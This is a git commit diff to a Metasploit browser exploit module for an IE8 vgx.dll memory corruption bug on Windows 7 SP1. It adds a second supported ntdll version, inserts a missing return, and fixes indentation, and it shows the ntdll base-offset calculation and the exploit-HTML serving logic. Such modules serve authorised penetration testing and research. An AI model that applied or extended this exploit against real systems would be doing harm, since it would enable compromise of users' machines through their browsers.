Fix description, code and perform test

2013-06-12 11:07:03 -05:00
parent 5c8053491f
commit c38eabe481
1 changed files with 6 additions and 5 deletions
@@ -33,8 +33,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				shapes on the vgx.dll module. This module has been tested successfully on Windows 7
 				SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target
 				to use an info leak to disclose the ntdll.dll base address is provided. This target
-				requires ntdll.dll v 6.1.7601.17514 in order to work (the default dll version on a
-				fresh Windows 7 SP1 installation).
+				requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1
+				installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -415,6 +415,7 @@ function exploit(){
 				html = html.gsub(/^\t\t/, '')
 				print_status("Sending HTML to trigger...")
 				send_response(cli, html, {'Content-Type'=>'text/html'})
+				return
 			end

 			vprint_status("ntdll leak: 0x#{leak.to_s(16)}")
@@ -428,9 +429,9 @@ function exploit(){
 				@ntdll_version = "6.1.7601.17725" # MS12-001
 				@ntdll_base = leak - 0x47090
 			else
-			print_error("ntdll version not detected, sending 404: #{agent}")
-			send_not_found(cli)
-			return
+				print_error("ntdll version not detected, sending 404: #{agent}")
+				send_not_found(cli)
+				return
 			end

 			html = load_exploit_html(my_target, cli)